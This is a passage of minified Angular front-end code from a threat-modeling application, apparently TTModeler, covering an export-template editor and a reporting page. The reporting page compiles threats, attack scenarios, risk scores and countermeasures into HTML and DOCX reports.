n=e.target.value;if(this.template.Template[i].value=""==n?null:n,this.template.Template[i].value&&(this.template.Template[i].name=this.translate.instant(this.GetExportPropertyName(this.template.Template[i].value.split(".")[1]))),i==this.template.Template.length-1&&""!=n&&this.template.Template.push({name:"",value:null}),""==n){let r=this.template.Template.length;for(;r>0&&null==this.template.Template[r-1].value;)r-=1;this.template.Template.splice(r+1)}}AddColumn(e){this.template.Template.splice(e+1,0,{name:"",value:null})}DeleteColumn(e){const i=this.template.Template.indexOf(e);i>=0&&this.template.Template.splice(i,1)}GetAvailableClasses(){return DT.GetKeys(this.template.ExportType)}GetExportClassName(e){return DT.ToString(e)}GetExportProperties(e){return DT.GetProperties(e)}GetExportPropertyName(e){return Yo.GetKeys().includes(e)?Yo.ToString(e):bT.GetKeys().includes(e)?bT.ToString(e):MT.GetKeys().includes(e)?MT.ToString(e):vT.GetKeys().includes(e)?vT.ToString(e):AT.GetKeys().includes(e)?AT.ToString(e):TT.GetKeys().includes(e)?TT.ToString(e):ET.GetKeys().includes(e)?ET.ToString(e):void 0}GetExportTypeValues(){return OG.GetKeys()}GetExportTypeName(e){return OG.ToString(e)}GetExportFilterValues(){return NG.GetKeys()}GetExportFilterName(e){return NG.ToString(e)}ApplyFilter(e){this.dataRows.filter=e.target.value.trim().toLowerCase()}ToString(e){return e.toString()}}return t.\u0275fac=function(e){return new(e||t)(Ee(Oa),Ee(Yi),Ee(Sn))},t.\u0275cmp=Wt({type:t,selectors:[["app-export-template"]],viewQuery:function(e,i){if(1&e&&Mi(al,5),2&e){let n;Vt(n=Bt())&&(i.sort=n.first)}},inputs:{template:"template",canEdit:"canEdit"},decls:1,vars:1,consts:[["style","overflow: auto;",3,"disable",4,"ngIf"],[2,"overflow","auto"],["appearance","fill",1,"property-form-field"],["matInput","","matTooltipShowDelay","1000",3,"spellcheck","ngModel","matTooltip","ngModelChange"],["matTooltipShowDelay","1000",3,"value","matTooltip","valueChange"],[3,"value",4,"ngFor","ngForOf"],["appearance","fill","style","margin-left: 10px;","class","property-form-field",4,"ngIf"],[3,"borderColor",4,"ngFor","ngForOf"],[2,"margin-top","10px"],["mat-raised-button","",3,"disabled","click"],["mat-raised-button","","color","primary",2,"margin-left","10px",3,"disabled","click"],["class","property-form-field","style","margin-top: 10px;",4,"ngIf"],[2,"margin-bottom","10px","max-height","300px","overflow","auto"],["mat-table","","matSort","",3,"dataSource",4,"ngIf"],[3,"value"],["appearance","fill",1,"property-form-field",2,"margin-left","10px"],["mat-icon-button","","matTooltipShowDelay","1000",2,"width","25px",3,"matTooltip","click"],[2,"width","142px",3,"ngModel","ngModelChange"],[2,"width","150px",3,"ngModel","ngModelChange","change"],["value",""],[3,"label",4,"ngFor","ngForOf"],[3,"label"],[1,"property-form-field",2,"margin-top","10px"],["matInput","",3,"keyup"],["mat-table","","matSort","",3,"dataSource"],[3,"matColumnDef",4,"ngFor","ngForOf"],["mat-header-row","",4,"matHeaderRowDef","matHeaderRowDefSticky"],["mat-row","",4,"matRowDef","matRowDefColumns"],[3,"matColumnDef"],["mat-header-cell","","mat-sort-header","",4,"matHeaderCellDef"],["mat-cell","",4,"matCellDef"],["mat-header-cell","","mat-sort-header",""],["mat-cell",""],["mat-header-row",""],["mat-row",""]],template:function(e,i){1&e&&ne(0,myt,84,52,"div",0),2&e&&V("ngIf",i.template)},dependencies:[Zi,Ri,pm,_m,an,Ed,Ta,Ea,oa,da,nn,un,Nr,yr,Xa,Pa,Au,Tu,jh,xm,Dm,Du,Eu,wm,Qh,xc,al,bp,Xi],styles:[".property-form-field[_ngcontent-%COMP%]{width:300px}.disable[_ngcontent-%COMP%]{pointer-events:none}"]}),t})();var x2=function(t,a,e,i){return new(e||(e=Promise))(function(r,c){function d(q){try{k(i.next(q))}catch(Y){c(Y)}}function T(q){try{k(i.throw(q))}catch(Y){c(Y)}}function k(q){q.done?r(q.value):function n(r){return r instanceof e?r:new e(function(c){c(r)})}(q.value).then(d,T)}k((i=i.apply(t,a||[])).next())})};const hyt=["reportcontent"];function fyt(t,a){1&t&&(s(0,"\n              "),m(1,"mat-icon",8),s(2,"description"),u(),s(3),oe(4,"translate")),2&t&&(C(3),ct("\n              ",re(4,1,"pages.reporting.Report"),"\n            "))}function pyt(t,a){if(1&t){const e=Ye();m(0,"button",12),s(1,"\n                  "),m(2,"mat-slide-toggle",13),he("ngModelChange",function(n){return be(e),Me(B(2).ShowTestCases=n)})("click",function(n){return n.stopPropagation()}),s(3),oe(4,"translate"),u(),s(5,"\n                "),u()}if(2&t){const e=B(2);C(2),V("ngModel",e.ShowTestCases),C(1),ct("\n                    ",re(4,2,"pages.reporting.showTestCases"),"\n                  ")}}function _yt(t,a){1&t&&it(0,"mat-progress-spinner",23),2&t&&V("diameter",25)}function gyt(t,a){1&t&&(bt(0),s(1),oe(2,"translate"),Mt()),2&t&&(C(1),ke(re(2,1,"pages.reporting.toBeGenerated")))}function Cyt(t,a){if(1&t){const e=Ye();s(0,"\n              "),m(1,"button",9),he("click",function(){return be(e),Me(B().GenerateReport())}),s(2),oe(3,"translate"),u(),s(4,"\n              "),m(5,"button",10),s(6,"\n                "),m(7,"mat-icon"),s(8,"settings"),u(),s(9,"\n              "),u(),s(10,"\n              "),m(11,"mat-menu",null,11),s(13,"\n                "),m(14,"button",12),s(15,"\n                  "),m(16,"mat-slide-toggle",13),he("ngModelChange",function(n){return be(e),Me(B().ShowCharts=n)})("click",function(n){return n.stopPropagation()}),s(17),oe(18,"translate"),u(),s(19,"\n                "),u(),s(20,"\n                "),m(21,"button",12),s(22,"\n                  "),m(23,"mat-slide-toggle",13),he("ngModelChange",function(n){return be(e),Me(B().DiagramShowGrid=n)})("click",function(n){return n.stopPropagation()}),s(24),oe(25,"translate"),u(),s(26,"\n                "),u(),s(27,"\n                "),m(28,"button",12),s(29,"\n                  "),m(30,"mat-slide-toggle",13),he("ngModelChange",function(n){return be(e),Me(B().ShowFirstTwoSteps=n)})("click",function(n){return n.stopPropagation()}),s(31),oe(32,"translate"),u(),s(33,"\n                "),u(),s(34,"\n                "),ne(35,pyt,6,4,"button",14),s(36,"\n              "),u(),s(37,"\n              "),ne(38,_yt,1,1,"mat-progress-spinner",15),s(39,"\n              "),m(40,"button",16),he("click",function(){return be(e),Me(B().SaveHTML())}),s(41),oe(42,"translate"),u(),s(43,"\n              "),m(44,"button",17),he("click",function(){return be(e),Me(B().SaveDOCX())}),s(45),oe(46,"translate"),u(),s(47,"\n\n              "),m(48,"div",18),s(49,"\n                "),m(50,"div",19,20),s(52,"\n                  "),m(53,"h1"),s(54,"TTModeler Report "),it(55,"img",21),u(),s(56,"\n                  "),m(57,"p"),s(58),oe(59,"translate"),u(),s(60,"\n                  "),m(61,"h2"),s(62),u(),s(63,"\n                  "),m(64,"p"),s(65),oe(66,"localDate"),oe(67,"translate"),u(),s(68,"\n                  "),ne(69,gyt,3,3,"ng-container",22),s(70,"\n                "),u(),s(71,"\n              "),u(),s(72,"\n            ")}if(2&t){const e=Ti(12),i=B();C(1),V("disabled",i.IsReportGenerating),C(1),ke(re(3,22,"pages.reporting.GenerateReport")),C(3),V("disabled",i.IsReportGenerating)("matMenuTriggerFor",e),C(11),V("ngModel",i.ShowCharts),C(1),ct("\n                    ",re(18,24,"pages.reporting.showCharts"),"\n                  "),C(6),V("ngModel",i.DiagramShowGrid),C(1),ct("\n                    ",re(25,26,"pages.reporting.showGrid"),"\n                  "),C(6),V("ngModel",i.ShowFirstTwoSteps),C(1),ct("\n                    ",re(32,28,"pages.reporting.showFristTwoSteps"),"\n                  "),C(4),V("ngIf",i.dataService.Project.HasTesting),C(3),V("ngIf",i.IsReportGenerating),C(2),V("disabled",!i.IsReportGenerated),C(1),ke(re(42,30,"pages.reporting.DownloadHTML")),C(3),V("disabled",!i.IsReportGenerated),C(1),ke(re(46,32,"pages.reporting.DownloadDOCX")),C(13),ke(re(59,34,"report.for")),C(4),ke(i.Project.GetProjectName()),C(3),Y_("",re(66,36,i.GetDate()),", ",re(67,38,"properties.Version")," ",i.Project.UserVersion,""),C(4),V("ngIf",!i.IsReportGenerated)}}function yyt(t,a){1&t&&(s(0,"\n              "),m(1,"mat-icon",8),s(2,"table_chart"),u(),s(3),oe(4,"translate")),2&t&&(C(3),ct("\n              ",re(4,1,"pages.reporting.Export"),"\n            "))}function byt(t,a){if(1&t){const e=Ye();m(0,"mat-list-item",33),he("click",function(){const r=be(e).$implicit;return Me(B(2).selectedExportTemplate=r)}),s(1,"\n                      "),m(2,"mat-icon",34),s(3,"arrow_right"),u(),s(4,"\n                      "),m(5,"div",35),s(6),u(),s(7,"\n                      "),m(8,"button",36),he("click",function(){const r=be(e).$implicit;return Me(B(2).DeleteTemplate(r))}),oe(9,"translate"),m(10,"mat-icon"),s(11,"delete"),u()(),s(12,"\n                    "),u()}if(2&t){const e=a.$implicit,i=B(2);Ct("highlight-light",i.selectedExportTemplate===e&&!i.theme.IsDarkMode)("highlight-dark",i.selectedExportTemplate===e&&i.theme.IsDarkMode),at("matTooltip",e.Name),C(6),ke(e.Name),C(2),at("matTooltip",re(9,7,"general.Delete"))}}function Myt(t,a){1&t&&it(0,"app-export-template",37),2&t&&V("template",B(2).selectedExportTemplate)}function vyt(t,a){if(1&t){const e=Ye();s(0,"\n              "),m(1,"div",24),s(2,"\n                "),m(3,"div",25),s(4,"\n                  "),m(5,"mat-list",26),s(6,"\n                    "),m(7,"div",27),s(8),oe(9,"translate"),m(10,"button",28),he("click",function(){return be(e),Me(B().AddTemplate())}),oe(11,"translate"),m(12,"mat-icon"),s(13,"add"),u()(),s(14,"\n                    "),u(),s(15,"\n                    "),ne(16,byt,13,9,"mat-list-item",29),s(17,"\n                  "),u(),s(18,"\n                  "),m(19,"button",30),he("click",function(){return be(e),Me(B().SaveExcel())}),s(20),oe(21,"translate"),u(),s(22,"\n                "),u(),s(23,"\n                "),m(24,"div",31),s(25,"\n                  "),m(26,"div",4),s(27,"\n                    "),ne(28,Myt,1,1,"app-export-template",32),s(29,"\n                  "),u(),s(30,"\n                "),u(),s(31,"\n              "),u(),s(32,"\n            ")}if(2&t){const e=B();C(5),Ct("prop-list-light",!e.theme.IsDarkMode)("prop-list-dark",e.theme.IsDarkMode),C(3),ct("",re(9,10,"pages.reporting.Templates")," \n                      "),C(2),at("matTooltip",re(11,12,"general.Add")),C(6),V("ngForOf",e.exportTemplates),C(3),V("disabled",0==e.exportTemplates.length),C(1),ke(re(21,14,"pages.reporting.exporttemplate.DownloadExcel")),C(8),V("ngIf",e.selectedExportTemplate)}}const Ayt=[{path:"reporting",component:(()=>{class t{constructor(e,i,n,r,c,d,T,k,q){this.theme=e,this.dataService=i,this.ttmService=n,this.translate=r,this.dialog=c,this.router=d,this.http=T,this.locStorage=k,this.viewContainerRef=q,this.docWidth=793,this.htmlBuffer=[],this.docxBuffer=[],this.IsReportGenerated=!1,this.IsReportGenerating=!1,this.selectedExportTemplate=null,this.dataService.Project||this.router.navigate(["/home"],{queryParams:{origin:"reporting"}}),null==this.locStorage.Get(si.PAGE_REPORTING_SHOW_FIRST_STEPS)&&(this.ShowFirstTwoSteps=!0),null==this.locStorage.Get(si.PAGE_REPORTING_SHOW_TEST_CASES)&&(this.ShowTestCases=!0)}get ShowCharts(){return"true"==this.locStorage.Get(si.PAGE_REPORTING_SHOW_CHARTS)}set ShowCharts(e){this.locStorage.Set(si.PAGE_REPORTING_SHOW_CHARTS,String(e))}get DiagramShowGrid(){return"true"==this.locStorage.Get(si.PAGE_REPORTING_DIAGRAM_SHOW_GRID)}set DiagramShowGrid(e){this.locStorage.Set(si.PAGE_REPORTING_DIAGRAM_SHOW_GRID,String(e))}get ShowFirstTwoSteps(){return"true"==this.locStorage.Get(si.PAGE_REPORTING_SHOW_FIRST_STEPS)}set ShowFirstTwoSteps(e){this.locStorage.Set(si.PAGE_REPORTING_SHOW_FIRST_STEPS,String(e))}get ShowTestCases(){return"true"==this.locStorage.Get(si.PAGE_REPORTING_SHOW_TEST_CASES)}set ShowTestCases(e){this.locStorage.Set(si.PAGE_REPORTING_SHOW_TEST_CASES,String(e))}get exportTemplates(){return this.dataService.Project.GetExportTemplates()}ngOnInit(){this.Project=this.dataService.Project}GenerateReport(){return x2(this,void 0,void 0,function*(){this.IsReportGenerating=!0,yield this.initializeReportHTML(),this.initializeReportDOCX().then(()=>x2(this,void 0,void 0,function*(){var e,i,n,r;this.Project.Participants.length>0&&(this.createParagraph(this.translate.instant("report.by")),this.createUL(this.Project.Participants.map(Ne=>{var et;return Ne.Name+((null===(et=Ne.Email)||void 0===et?void 0:et.length)>0?" ("+Ne.Email+")":"")}))),this.createHeading(this.translate.instant("report.ExecutiveSummary")),this.Project.GetMobileApps().length>0?this.createParagraph(Gi.Format(this.translate.instant("report.SUCinContext"),this.Project.GetDevices().map(Ne=>Ne.Name).join(", "),this.Project.GetMobileApps().map(Ne=>Ne.Name).join(", "))):this.createParagraph(Gi.Format(this.translate.instant("report.SUC"),this.Project.GetDevices().map(Ne=>Ne.Name).join(", "),this.Project.GetMobileApps().map(Ne=>Ne.Name).join(", "))),this.createParagraph(Gi.Format(this.translate.instant("report.UseCaseUC"),this.Project.GetDFDiagrams().map(Ne=>Ne.Name).join(", "))),this.createParagraph(""),this.Project.Image&&(yield(et=>x2(this,void 0,void 0,function*(){const ut=new Image;return ut.src=et,yield ut.decode(),ut}))(this.Project.Image).then(et=>{this.createImage(this.Project.Image,et.naturalWidth,et.naturalHeight),this.createParagraph("")})),this.createParagraph(this.translate.instant("report.IdentifiedSystemThreats")+": "),this.createUL(this.Project.GetSystemThreats().map(Ne=>Ne.GetLongName())),this.createParagraph(""),this.createParagraph(Gi.Format(this.translate.instant("report.scenariosAndMeasures"),this.Project.GetAttackScenariosApplicable().length.toString(),this.Project.GetCountermeasuresApplicable().length.toString())),this.createParagraph(""),this.createParagraph(this.translate.instant("report.riskAssessment")),this.createLink(this.translate.instant("report.FurtherInfoCVSS"),"https://www.first.org/cvss/specification-document"),this.createRiskTable(),this.createParagraph(""),this.createParagraph(this.translate.instant("report.riskStrategy")),this.createParagraph("");let c=[],d=[];this.Project.GetMyTagCharts().filter(Ne=>Ne.MyTags.length>0).forEach(Ne=>{c.push(Cf.CreateTagDiagram),d.push(Ne)}),c.push(Cf.CreateSeveritySummaryDiagram,Cf.CreateRiskSummaryDiagram,Cf.CreateSeverityPerTypeDiagram,Cf.CreateSeverityPerLifecycleDiagram,Cf.CreateSeverityPerImpactCatDiagram,Cf.CreateCountermeasureSummaryDiagram),d.push(null,null,null,null,null,null);for(let Ne=0;Ne<c.length;Ne++){const et=c[Ne](this.Project,this.translate,!1,600,400,d[Ne]);if(this.ShowCharts){let ut=this.viewContainerRef.createComponent(SZ);ut.instance.elRef.nativeElement.style.color="black",ut.instance.diagram=et,yield new Promise(yt=>setTimeout(()=>{let It=St=>{St.classList.remove("chartDark"),Array.from(St.children).forEach(Nt=>It(Nt))};It(ut.instance.elRef.nativeElement),yt()},10)),yield this.getComponentImage(ut,600,[0,0,0,0]).then(yt=>{this.createImage(yt[0],yt[1],yt[2])})}else if((null===(e=et.results)||void 0===e?void 0:e.length)>0){let ut=[];et.results.forEach(Ze=>{ut.push([Ze.name,...Ze.series.map(yt=>yt.value)])}),this.createTable([et.xAxisLabel,...et.results[0].series.map(Ze=>Ze.name)],ut),this.createParagraph("")}}if(this.Project.GetSystemThreats().length>0){this.createSubHeading(this.translate.instant("report.RiskOfSystemThreats")),this.createParagraph(this.translate.instant("report.systemThreatsExplanation")),this.createParagraph("");const Ne=this.Project.GetAttackScenariosApplicable();this.Project.GetSystemThreats().forEach(et=>{const ut=Ne.filter(Ze=>Ze.SystemThreats.includes(et));if(ut.sort((Ze,yt)=>Ze.Risk>=0&&yt.Risk>=0?Number(Ze.Risk)>Number(yt.Risk)?-1:Number(Ze.Risk)==Number(yt.Risk)?0:1:Ze.Risk?-1:1),ut.length>0){const Ze=ut.map(Nt=>Nt.Risk).filter(Nt=>Nt==Nt&&null!=Nt),yt=Math.max(...Ze.map(Nt=>Number(Nt))),It=this.translate.instant(yt>0?vn.ToString(yt):"report.UnknownRisk");this.createParagraph(et.GetLongName()+" - "+this.translate.instant("properties.Risk")+": "+It);const St=[];ut.forEach(Nt=>{const oi=[];Nt.ScoreCVSS&&Nt.ScoreCVSS.Score>0&&oi.push(this.translate.instant("report.CvssScore")+": "+Nt.ScoreCVSS.Score.toFixed(1)),Nt.ScoreOwaspRR&&Nt.ScoreOwaspRR.Score>0&&oi.push(this.translate.instant("report.OwaspRRScore")+": "+Nt.ScoreOwaspRR.Score.toFixed(1)),Nt.Likelihood&&oi.push(this.translate.instant("general.Likelihood")+": "+this.translate.instant(An.ToString(Nt.Likelihood))),Nt.Risk&&oi.push(this.translate.instant("properties.Risk")+": "+this.translate.instant(vn.ToString(Nt.Risk))),St.push(Nt.GetLongName()+": "+oi.join(", "))}),this.createUL(St)}else this.createParagraph(et.GetLongName()+" - "+this.translate.instant("report.UnknownRisk"));this.createParagraph("")})}const T=Ne=>{const et=this.Project.GetAttackScenariosApplicable().filter(Ze=>Ze.ViewID==Ne);et.sort((Ze,yt)=>{var It,St;const Nt=(Ai,vi)=>Ai>=0&&vi>=0?Number(Ai)>Number(vi)?-1:Number(Ai)<Number(vi)?1:0:Ai?-1:1;let oi=Nt(Ze.Risk,yt.Risk);return 0==oi&&(oi=Nt(Ze.Severity,yt.Severity)),0==oi&&(oi=Nt(Ze.ThreatState,yt.ThreatState)),0==oi&&(null===(It=Ze.ScoreCVSS)||void 0===It?void 0:It.Score)&&(null===(St=yt.ScoreCVSS)||void 0===St?void 0:St.Score)&&(oi=Nt(Ze.ScoreCVSS,yt.ScoreCVSS)),0==oi&&(oi=Nt(yt.Number,Ze.Number)),oi}),et.length>0&&(this.createParagraph(""),this.createSubSubSubHeading(this.translate.instant("general.AttackScenarios")),et.forEach(Ze=>{var yt,It,St,Nt,oi,Ai,vi,xi,Za,wa,en,Vo,Di;this.createBoldParagraph(Ze.GetLongName()),this.createParagraph(this.translate.instant("properties.Status")+": "+this.translate.instant(ku.ToString(Ze.ThreatState))),(null===(yt=Ze.Description)||void 0===yt?void 0:yt.length)>0&&this.createParagraph(this.translate.instant("properties.Description")+": "+Ze.Description),(null===(It=Ze.SystemThreats)||void 0===It?void 0:It.length)>0&&this.createParagraph(this.translate.instant("general.SystemThreats")+": "+Ze.SystemThreats.map(Oi=>Oi.Name).join(", ")),this.Project.Settings.ThreatActorToAttackScenario&&(null===(St=Ze.ThreatSources)||void 0===St?void 0:St.length)>0&&this.createParagraph(this.translate.instant("general.ThreatSources")+": "+Ze.ThreatSources.map(Oi=>Oi.Name).join(", ")),!(null===(oi=null===(Nt=Ze.AttackVector)||void 0===Nt?void 0:Nt.AttackTechnique)||void 0===oi)&&oi.CAPECID&&this.createLink(this.translate.instant("properties.CAPECID")+": "+Ze.AttackVector.AttackTechnique.CAPECID.toString(),wZ.GetURL(Ze.AttackVector.AttackTechnique.CAPECID)),!(null===(vi=null===(Ai=Ze.AttackVector)||void 0===Ai?void 0:Ai.Weakness)||void 0===vi)&&vi.CWEID&&this.createLink(this.translate.instant("properties.CWEID")+": "+Ze.AttackVector.Weakness.CWEID.toString(),N5.GetURL(Ze.AttackVector.Weakness.CWEID)),Ze.GetAffectedAssetObjects().length>0&&this.createParagraph(this.translate.instant("report.AffectedAssets")+": "+Ze.GetAffectedAssetObjects().map(Oi=>Oi.GetLongName()).join(", ")),Ze.ScoreCVSS&&Ze.ScoreCVSS.Score&&(this.createParagraph(this.translate.instant("report.CvssScore")+": "+Ze.ScoreCVSS.Score.toFixed(1)),this.createLink(this.translate.instant("report.CvssVector")+": "+Wm.GetVector(Ze.ScoreCVSS),Wm.GetURL(Ze.ScoreCVSS))),Ze.ScoreOwaspRR&&Ze.ScoreOwaspRR.Score&&(this.createParagraph(this.translate.instant("report.OwaspRRScore")+": "+Ze.ScoreOwaspRR.Score.toFixed(1)),this.createLink(this.translate.instant("report.OwaspRRVector")+": "+IT.GetVector(Ze.ScoreOwaspRR),IT.GetURL(Ze.ScoreOwaspRR))),Ze.Severity&&this.createParagraph(this.translate.instant("properties.Severity")+": "+this.translate.instant(vn.ToString(Ze.Severity))),(null===(xi=Ze.SeverityReason)||void 0===xi?void 0:xi.length)>0&&this.createParagraph(this.translate.instant("properties.SeverityReason")+": "+Ze.SeverityReason),Ze.Likelihood&&this.createParagraph(this.translate.instant("general.Likelihood")+": "+this.translate.instant(An.ToString(Ze.Likelihood))),(null===(Za=Ze.LikelihoodReason)||void 0===Za?void 0:Za.length)>0&&this.createParagraph(this.translate.instant("properties.LikelihoodReason")+": "+Ze.LikelihoodReason),Ze.Risk&&this.createParagraph(this.translate.instant("properties.Risk")+": "+this.translate.instant(vn.ToString(Ze.Risk))),(null===(wa=Ze.RiskReason)||void 0===wa?void 0:wa.length)>0&&this.createParagraph(this.translate.instant("properties.RiskReason")+": "+Ze.RiskReason),Ze.RiskStrategy&&this.createParagraph(this.translate.instant("properties.RiskStrategy")+": "+this.translate.instant(fT.ToString(Ze.RiskStrategy))),(null===(en=Ze.RiskStrategyReason)||void 0===en?void 0:en.length)>0&&this.createParagraph(this.translate.instant("properties.RiskStrategyReason")+": "+Ze.RiskStrategyReason),(null===(Vo=Ze.GetCountermeasures())||void 0===Vo?void 0:Vo.length)>0&&this.createParagraph(this.translate.instant("general.Countermeasures")+": "+Ze.GetCountermeasures().map(Oi=>Oi.GetLongName()).join(", ")),(null===(Di=Ze.LinkedScenarios)||void 0===Di?void 0:Di.length)>0&&this.createParagraph(this.translate.instant("report.SeeAlso")+": "+Ze.LinkedScenarios.map(Oi=>"AS"+Oi.Number).join(", "));const Pi=this.Project.GetTestCases().filter(Oi=>Oi.LinkedScenarios.includes(Ze));Pi.length>0&&this.createParagraph(this.translate.instant("report.SeeAlso")+": "+Pi.map(Oi=>"TC"+Oi.Number).join(", ")),Ze.MyTags.length>0&&this.createParagraph(this.translate.instant("general.Tags")+": "+Ze.MyTags.map(Oi=>Oi.Name).join(", ")),this.createParagraph("")}));const ut=this.Project.GetCountermeasuresApplicable().filter(Ze=>Ze.ViewID==Ne);ut.length>0&&(this.createParagraph(""),this.createSubSubSubHeading(this.translate.instant("general.Countermeasures")),ut.forEach(Ze=>{var yt;this.createBoldParagraph(Ze.GetLongName()),Ze.MitigationState&&this.createParagraph(this.translate.instant("properties.Status")+": "+this.translate.instant(Sl.ToString(Ze.MitigationState))),(null===(yt=Ze.Description)||void 0===yt?void 0:yt.length)>0&&this.createParagraph(this.translate.instant("properties.Description")+": "+Ze.Description),Ze.MitigationProcess&&this.createParagraph(this.translate.instant("general.MitigationProcess")+": "+Ze.MitigationProcess.GetLongName()),this.createParagraph(this.translate.instant("pages.modeling.countermeasure.mitigatedThreats")+": "+Ze.AttackScenarios.map(St=>St.GetLongName()).join(", "));const It=this.Project.GetTestCases().filter(St=>St.LinkedMeasures.includes(Ze));It.length>0&&this.createParagraph(this.translate.instant("report.SeeAlso")+": "+It.map(St=>"TC"+St.Number).join(", ")),Ze.MyTags.length>0&&this.createParagraph(this.translate.instant("general.Tags")+": "+Ze.MyTags.map(St=>St.Name).join(", ")),this.createParagraph("")}))};this.createParagraph(""),this.createHeading(this.translate.instant("report.DetailedResults")),this.ShowFirstTwoSteps&&(this.createSubHeading(this.ttmService.Stages[0].steps[0].name.replace("[Optional]","")),this.Project.GetCharScope().StepProperties.forEach(Ne=>{this.Project.GetCharScope()[Ne].length>0&&(this.createSubSubHeading(this.translate.instant("pages.modeling.charscope."+Ne)),this.createUL(this.Project.GetCharScope()[Ne]))}),this.createSubHeading(this.ttmService.Stages[0].steps[1].name.replace("[Optional]","")),this.Project.GetObjImpact().StepProperties.forEach(Ne=>{this.Project.GetObjImpact()[Ne].length>0&&(this.createSubSubHeading(this.translate.instant("pages.modeling.objimpact."+Ne)),this.createUL(this.Project.GetObjImpact()[Ne]))})),this.createSubHeading(this.ttmService.Stages[0].steps[2].name.replace("[Optional]","")),this.createSubSubHeading(this.translate.instant("report.SysInterationDia")),this.createDiagram(this.Project.GetSysContext().ContextDiagram),T(this.Project.GetSysContext().ContextDiagram.ID),this.createSubSubHeading(this.translate.instant("report.UseCaseDia")),this.createDiagram(this.Project.GetSysContext().UseCaseDiagram),T(this.Project.GetSysContext().UseCaseDiagram.ID),this.createSubHeading(this.ttmService.Stages[0].steps[3].name),this.createParagraph(this.translate.instant("report.identifiedAssets"));let k=[["Assets",this.Project.GetProjectAssetGroup()]];this.Project.GetDevices().forEach(Ne=>k.push([Ne.Name,Ne.AssetGroup])),this.Project.GetMobileApps().forEach(Ne=>k.push([Ne.Name,Ne.AssetGroup])),k=k.filter(Ne=>null!=Ne[1]);const q=k.filter(Ne=>Ne[1].IsActive).length,Y=this.locStorage.Get(si.PAGE_MODELING_ASSETS_TAB_INDEX);this.locStorage.Set(si.PAGE_MODELING_ASSETS_TAB_INDEX,"0");for(let Ne=0;Ne<k.length;Ne++)if(k[Ne][1].IsActive){q>1&&this.createSubSubHeading(k[Ne][0]);const et=this.viewContainerRef.createComponent(IZ);et.instance.assetGroup=k[Ne][1],et.instance.hideButtons=!0,et.instance.elRef.nativeElement.style.color="black",yield new Promise(yt=>setTimeout(()=>{let It=St=>{St.classList.contains("assetColumn")&&(St.style.backgroundColor="#e7e5e5"),"path"==St.tagName&&St.setAttribute("fill","#e7e5e5"),Array.from(St.children).forEach(Nt=>It(Nt))};It(et.instance.elRef.nativeElement),yt()},10)),yield this.getComponentImage(et,this.docWidth,[0,25,0,0]).then(yt=>{this.createImage(yt[0],yt[1],yt[2])});const Ze=[...k[Ne][1].GetGroupsFlat().filter(yt=>yt.IsNewAsset),...k[Ne][1].GetMyDataFlat().filter(yt=>yt.IsNewAsset)];Ze.sort((yt,It)=>Number(yt.Number)>Number(It.Number)?1:yt.Number==It.Name?0:-1),this.createUL(Ze.map(yt=>{var It;let St=yt.GetLongName();return yt instanceof Pu&&(St+=" ("+this.translate.instant("properties.Sensitivity")+": "+this.translate.instant(An.ToString(yt.Sensitivity))+")"),(null===(It=yt.ImpactCats)||void 0===It?void 0:It.length)>0&&(St+=" ("+this.translate.instant("properties.ImpactCategories")+": "+yt.ImpactCats.map(Nt=>this.translate.instant(Vs.ToString(Nt))).join(", ")+")"),St}))}this.locStorage.Set(si.PAGE_MODELING_ASSETS_TAB_INDEX,Y),this.createSubHeading(this.translate.instant("general.ThreatSources")),this.createParagraph(this.translate.instant("report.IdentifiedThreatSources")+":"),this.Project.GetThreatSources().Sources.forEach(Ne=>{this.createBoldParagraph(Ne.GetLongName()),Ne.Motive.length>0&&(this.createParagraph(this.translate.instant("properties.Motive")+":"),this.createUL(Ne.Motive)),Ne.Capabilities.length>0&&(this.createParagraph(this.translate.instant("properties.Capabilities")+":"),this.createUL(Ne.Capabilities)),this.createParagraph(this.translate.instant("general.Likelihood")+": "+this.translate.instant(An.ToString(Ne.Likelihood))),this.createParagraph("")}),this.createSubHeading(this.translate.instant("general.SystemThreats")),this.Project.GetSystemThreats().forEach(Ne=>{var et,ut;this.createBoldParagraph(Ne.GetLongName()),Ne.ThreatCategory&&this.createParagraph(this.translate.instant("general.ThreatCategory")+": "+Ne.ThreatCategory.Name),(null===(et=Ne.Description)||void 0===et?void 0:et.length)>0&&this.createParagraph(this.translate.instant("properties.consequencesImpact")+": "+Ne.Description),(null===(ut=Ne.AffectedAssetObjects)||void 0===ut?void 0:ut.length)>0&&this.createParagraph(this.translate.instant("report.AffectedAssets")+": "+Ne.AffectedAssetObjects.map(Ze=>Ze.Name).join(", ")),this.createParagraph(this.translate.instant("properties.Impact")+": "+this.translate.instant(An.ToString(Ne.Impact))+" ("+Ne.ImpactCats.map(Ze=>this.translate.instant(Vs.ToString(Ze))).join(", ")+")"),this.createParagraph("")});const te=this.Project.GetDevices().length;te>0&&this.createSubHeading(this.ttmService.Stages[1].steps[1].name),this.Project.GetDevices().forEach(Ne=>{te>1&&this.createSubSubHeading(Ne.Name),this.createDiagram(Ne.HardwareDiagram),T(Ne.HardwareDiagram.ID)});const pe=Ne=>{Ne.classList.contains("component-dark")&&(Ne.style.borderColor="black",Ne.classList.remove("component-dark")),Ne.classList.contains("component-third-party")&&(Ne.style.backgroundColor="#e6e6e6"),Array.from(Ne.children).forEach(et=>pe(et))},Re=[...this.Project.GetDevices(),...this.Project.GetMobileApps()];let Fe=Re.map(Ne=>Ne.SoftwareStack).filter(Ne=>null!=Ne&&Ne.GetChildrenFlat().length>0).length;Fe>0&&this.createSubHeading(this.ttmService.Stages[1].steps[2].name);for(let Ne=0;Ne<Re.length;Ne++)if((null===(i=Re[Ne].SoftwareStack)||void 0===i?void 0:i.GetChildrenFlat().length)>0){Fe>1&&this.createSubSubHeading(Re[Ne].Name);const et=this.viewContainerRef.createComponent(gT);et.instance.stack=Re[Ne].SoftwareStack,et.instance.elRef.nativeElement.style.color="black",yield new Promise(Ze=>setTimeout(()=>{pe(et.instance.elRef.nativeElement),Ze()},10)),yield this.getComponentImage(et,this.docWidth,[20,50,0,25]).then(Ze=>{this.createImage(Ze[0],Ze[1],Ze[2]),T(Re[Ne].SoftwareStack.ID)})}this.createSubHeading(this.ttmService.Stages[1].steps[3].name),this.Project.GetHWDFDiagrams().filter(Ne=>Ne.DiagramType==xn.DataFlow).forEach(Ne=>{this.createSubSubHeading(Ne.Name),this.createDiagram(Ne),T(Ne.ID)}),Fe=Re.map(Ne=>Ne.ProcessStack).filter(Ne=>null!=Ne&&Ne.GetChildrenFlat().length>0).length,Fe>0&&this.createSubHeading(this.ttmService.Stages[1].steps[4].name);for(let 